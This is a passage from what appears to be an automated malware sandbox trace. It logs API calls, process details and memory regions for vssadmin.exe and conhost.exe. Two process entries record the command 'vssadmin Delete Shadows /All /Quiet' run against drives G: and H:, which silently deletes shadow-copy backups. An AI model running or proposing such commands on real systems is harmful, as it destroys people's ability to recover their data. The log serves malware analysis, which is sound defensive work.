	[0309.463] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=G: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18f658*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=G: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f6a4 | out: lpCommandLine="vssadmin  Delete Shadows /For=G: /All /Quiet ", lpProcessInformation=0x18f6a4*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x12b4, dwThreadId=0x12b8)) returned 1
	[0309.519] CloseHandle (hObject=0xa4) returned 1
	[0309.519] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0309.519] GetProcessHeap () returned 0x47c0000
	[0309.519] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cadf0) returned 1
	[0309.519] GetEnvironmentStringsW () returned 0x47ca248*
	[0309.520] GetProcessHeap () returned 0x47c0000
	[0309.520] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0xb9c) returned 0x47cadf0
	[0309.520] memcpy (in: _Dst=0x47cadf0, _Src=0x47ca248, _Size=0xb9c | out: _Dst=0x47cadf0) returned 0x47cadf0
	[0309.520] FreeEnvironmentStringsA (penv="=") returned 1
	[0309.520] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0321.359] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18f63c | out: lpExitCode=0x18f63c*=0x2) returned 1
	[0321.361] CloseHandle (hObject=0xa8) returned 1
	[0321.362] _vsnwprintf (in: _Buffer=0x18f724, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f644 | out: _Buffer="00000002") returned 8
	[0321.363] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0321.364] GetProcessHeap () returned 0x47c0000
	[0321.364] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cadf0) returned 1
	[0321.364] GetEnvironmentStringsW () returned 0x47ca248*
	[0321.365] GetProcessHeap () returned 0x47c0000
	[0321.365] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0xbc2) returned 0x47cc568
	[0321.365] memcpy (in: _Dst=0x47cc568, _Src=0x47ca248, _Size=0xbc2 | out: _Dst=0x47cc568) returned 0x47cc568
	[0321.365] FreeEnvironmentStringsA (penv="=") returned 1
	[0321.365] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0321.365] GetProcessHeap () returned 0x47c0000
	[0321.366] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cc568) returned 1
	[0321.366] GetEnvironmentStringsW () returned 0x47ca248*
	[0321.366] GetProcessHeap () returned 0x47c0000
	[0321.366] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0xbc2) returned 0x47cc568
	[0321.366] memcpy (in: _Dst=0x47cc568, _Src=0x47ca248, _Size=0xbc2 | out: _Dst=0x47cc568) returned 0x47cc568
	[0321.366] FreeEnvironmentStringsA (penv="=") returned 1
	[0321.366] GetProcessHeap () returned 0x47c0000
	[0321.366] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9568) returned 1
	[0321.366] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f6d0 | out: lpAttributeList=0x18f6d0) 
	[0321.366] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0321.366] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0321.518] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0321.518] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0321.695] _get_osfhandle (_FileHandle=0) returned 0x38
	[0321.695] GetConsoleMode (hConsoleHandle=0x38, lpMode=0x31f408) 

Thread:
	id = 388
	os_tid = 0x126c


Process:
	id = "69"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x2ac3f000"
	os_pid = "0x1234"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "65"
	os_parent_pid = "0x62c"
	cmd_line = "vssadmin  Delete Shadows /For=H: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 5115
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 5116
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 5117
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 5118
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 5119
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 5120
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 5121
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 5122
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 5123
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 5124
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 5125
	        start_va = 0x4880000
	          end_va = 0x4881fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 5126
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 5127
	        start_va = 0x7eb20000
	          end_va = 0x7eb42fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007eb20000"
	        filename = ""

Region:
	              id = 5128
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 5129
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 5130
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 5131
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 5132
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 5136
	        start_va = 0x100000
	          end_va = 0x14ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000100000"
	        filename = ""

Region:
	              id = 5137
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 5146
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 5147
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 5148
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 5161
	        start_va = 0x4890000
	          end_va = 0x4b4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004890000"
	        filename = ""

Region:
	              id = 5162
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 5168
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 5169
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 5170
	        start_va = 0x7ea20000
	          end_va = 0x7eb1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ea20000"
	        filename = ""

Region:
	              id = 5188
	        start_va = 0x400000
	          end_va = 0x4bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 5189
	        start_va = 0x4880000
	          end_va = 0x4883fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 5190
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 5191
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 5192
	        start_va = 0x100000
	          end_va = 0x13ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000100000"
	        filename = ""

Region:
	              id = 5193
	        start_va = 0x140000
	          end_va = 0x14ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000140000"
	        filename = ""

Region:
	              id = 5194
	        start_va = 0x150000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000150000"
	        filename = ""

Region:
	              id = 5195
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 5196
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 5197
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 5198
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 5199
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 5200
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 5201
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 5211
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 5212
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 5213
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 5214
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 5215
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 5216
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 5217
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 5221
	        start_va = 0x4890000
	          end_va = 0x4a1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004890000"
	        filename = ""

Region:
	              id = 5222
	        start_va = 0x4a50000
	          end_va = 0x4b4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a50000"
	        filename = ""

Region:
	              id = 5223
	        start_va = 0x4c0000
	          end_va = 0x647fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000004c0000"
	        filename = ""

Region:
	              id = 5224
	        start_va = 0x4890000
	          end_va = 0x48b9fff
	       monitored = 0
	     entry_point = 0x4895680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 5225
	        start_va = 0x4a10000
	          end_va = 0x4a1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a10000"
	        filename = ""

Region:
	              id = 5226
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 5227
	        start_va = 0x650000
	          end_va = 0x7d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000650000"
	        filename = ""

Region:
	              id = 5228
	        start_va = 0x4890000
	          end_va = 0x489cfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 5229
	        start_va = 0x4b50000
	          end_va = 0x5f4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004b50000"
	        filename = ""

Region:
	              id = 5241
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 5242
	        start_va = 0x190000
	          end_va = 0x190fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000190000"
	        filename = ""

Region:
	              id = 5243
	        start_va = 0x48a0000
	          end_va = 0x48a3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048a0000"
	        filename = ""

Region:
	              id = 5244
	        start_va = 0x48b0000
	          end_va = 0x4999fff
	       monitored = 0
	     entry_point = 0x48ed650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 5248
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 5487
	        start_va = 0x48b0000
	          end_va = 0x48b0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000048b0000"
	        filename = ""

Region:
	              id = 5488
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 5489
	        start_va = 0x48c0000
	          end_va = 0x48c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000048c0000"
	        filename = ""

Region:
	              id = 5516
	        start_va = 0x1a0000
	          end_va = 0x1dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001a0000"
	        filename = ""

Region:
	              id = 5517
	        start_va = 0x7e0000
	          end_va = 0x81ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007e0000"
	        filename = ""

Region:
	              id = 5523
	        start_va = 0x820000
	          end_va = 0x85ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000820000"
	        filename = ""

Region:
	              id = 5524
	        start_va = 0x48d0000
	          end_va = 0x490ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048d0000"
	        filename = ""

Region:
	              id = 5525
	        start_va = 0x4910000
	          end_va = 0x494ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004910000"
	        filename = ""

Region:
	              id = 5526
	        start_va = 0x4950000
	          end_va = 0x498ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004950000"
	        filename = ""

Region:
	              id = 5652
	        start_va = 0x5f50000
	          end_va = 0x602ffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 5656
	        start_va = 0x4990000
	          end_va = 0x4a0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004990000"
	        filename = ""

Region:
	              id = 5657
	        start_va = 0x4a20000
	          end_va = 0x4a28fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vsstrace.dll.mui")


Thread:
	id = 378
	os_tid = 0x133c


Thread:
	id = 383
	os_tid = 0xb38


Thread:
	id = 403
	os_tid = 0x112c


Thread:
	id = 404
	os_tid = 0xda0


Thread:
	id = 405
	os_tid = 0xda4


Process:
	id = "70"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x2aa47000"
	os_pid = "0xcf0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "68"
	os_parent_pid = "0x11c8"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 5149
	        start_va = 0x2f400000
	          end_va = 0x2f5fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000002f400000"
	        filename = ""

Region:
	              id = 5150
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 5151
	        start_va = 0xaaef290000
	          end_va = 0xaaef2cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000aaef290000"
	        filename = ""

Region:
	              id = 5152
	        start_va = 0xaaef400000
	          end_va = 0xaaef5fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000aaef400000"
	        filename = ""

Region:
	              id = 5153
	        start_va = 0x1ae440c0000
	          end_va = 0x1ae440dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ae440c0000"
	        filename = ""

Region:
	              id = 5154
	        start_va = 0x1ae440e0000
	          end_va = 0x1ae440f4fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001ae440e0000"
	        filename = ""

Region:
	              id = 5155
	        start_va = 0x7df5ffd20000
	          end_va = 0x7ff5ffd1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ffd20000"
	        filename = ""

Region:
	              id = 5156
	        start_va = 0x7ff7feec0000
	          end_va = 0x7ff7feee2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7feec0000"
	        filename = ""

Region:
	              id = 5157
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 5158
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 5159
	        start_va = 0x1ae44100000
	          end_va = 0x1ae443cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ae44100000"
	        filename = ""

Region:
	              id = 5160
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 5163
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 5164
	        start_va = 0x1ae440c0000
	          end_va = 0x1ae440cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001ae440c0000"
	        filename = ""

Region:
	              id = 5165
	        start_va = 0x7ff7fedc0000
	          end_va = 0x7ff7feebffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7fedc0000"
	        filename = ""

Region:
	              id = 5166
	        start_va = 0x1ae44100000
	          end_va = 0x1ae441bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 5167
	        start_va = 0x1ae442d0000
	          end_va = 0x1ae443cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ae442d0000"
	        filename = ""

Region:
	              id = 5171
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 5172
	        start_va = 0xaaef2d0000
	          end_va = 0xaaef30ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000aaef2d0000"
	        filename = ""

Region:
	              id = 5173
	        start_va = 0x1ae443d0000
	          end_va = 0x1ae4457ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ae443d0000"
	        filename = ""

Region:
	              id = 5174
	        start_va = 0x1ae440d0000
